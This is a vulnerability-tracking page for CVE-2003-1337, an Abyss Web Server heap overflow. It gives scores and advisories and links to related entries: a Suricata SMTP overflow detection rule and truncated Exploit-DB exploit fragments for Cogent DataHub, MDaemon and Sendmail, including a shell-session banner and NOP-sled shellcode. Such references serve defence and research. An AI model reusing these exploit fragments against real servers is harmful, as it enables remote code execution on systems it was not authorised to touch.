CVE-2003-1337
published 2003-12-31CVE-2003-1337: Heap-based buffer overflow in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EPSS
12.27%
95.7th percentile
Heap-based buffer overflow in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aprelium_technologies | abyss_web_server | <= 1.1.2 | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat10.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9j95-hw5q-64g3: Heap-based buffer overflow in Aprelium Abyss Web Server 1
ghsa_unreviewed·2022-04-29
CVE-2003-1337 [HIGH] CWE-119 GHSA-9j95-hw5q-64g3: Heap-based buffer overflow in Aprelium Abyss Web Server 1
Heap-based buffer overflow in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
Red Hat
security flaw
vendor_redhat·2003-03-29·CVSS 10.0
CVE-2003-0161 [CRITICAL] security flaw
security flaw
The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337.
Suricata
GPL SMTP EXPN overflow attempt
suricata·2010-09-23
CVE-2002-1337 GPL SMTP EXPN overflow attempt
GPL SMTP EXPN overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (msg:"GPL SMTP EXPN overflow attempt"; flow:established,to_server; content:"EXPN"; nocase; isdataat:255,relative; content:!"|0a|"; within:255; pcre:"/^EXPN[^\n]{255}/smi"; reference:bugtraq,6991; reference:bugtraq,7230; reference:cve,2002-1337; reference:cve,2003-0161; classtype:attempted-admin; sid:2102259; rev:10; metadata:created_at 2010_09_23, cve CVE_2002_1337, confidence Medium, signature_severity Major, updated_at 2024_03_08;)
Exploit-DB
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
exploitdb·2011-09-22
CVE-2011-3493 Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
---
#!/usr/bin/python
#
# Cogent Datahub > @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaste
Exploit-DB
Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)
exploitdb·2003-12-29
CVE-2003-1200 Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)
Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/9317/info
It has been reported that MDaemon/WorldClient mail server may be prone to a buffer overflow vulnerability when handling certain messages with a 'From' field of over 249 bytes. This issue may allow a remote attacker to gain unauthorized access to a system.
Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the vulnerable software in order to gain unauthorized access.
#include
#include
#include
#include
// Darn fucking 1337 macro shit
#define ISIP(m) (!(inet_addr(m) ==-1))
#define offset 267 //;267 //1024
// hmm :D
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"
struct sh_fix
{
unsigned long _wsa
Exploit-DB
Sendmail 8.12.x - Header Processing Buffer Overflow (1)
exploitdb·2003-03-02
CVE-2002-1337 Sendmail 8.12.x - Header Processing Buffer Overflow (1)
Sendmail 8.12.x - Header Processing Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/6991/info
Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.
Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.
Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.
/*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/
/*## sendmail 8.11.6 #*/
/* proof of concept code for remote sendmail vulnerability */
/* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */
/* [-c co
http://archives.neohapsis.com/archives/bugtraq/2003-06/0235.htmlhttp://www.securityfocus.com/bid/8062https://exchange.xforce.ibmcloud.com/vulnerabilities/12466http://archives.neohapsis.com/archives/bugtraq/2003-06/0235.htmlhttp://www.securityfocus.com/bid/8062https://exchange.xforce.ibmcloud.com/vulnerabilities/12466
2003-12-31
Published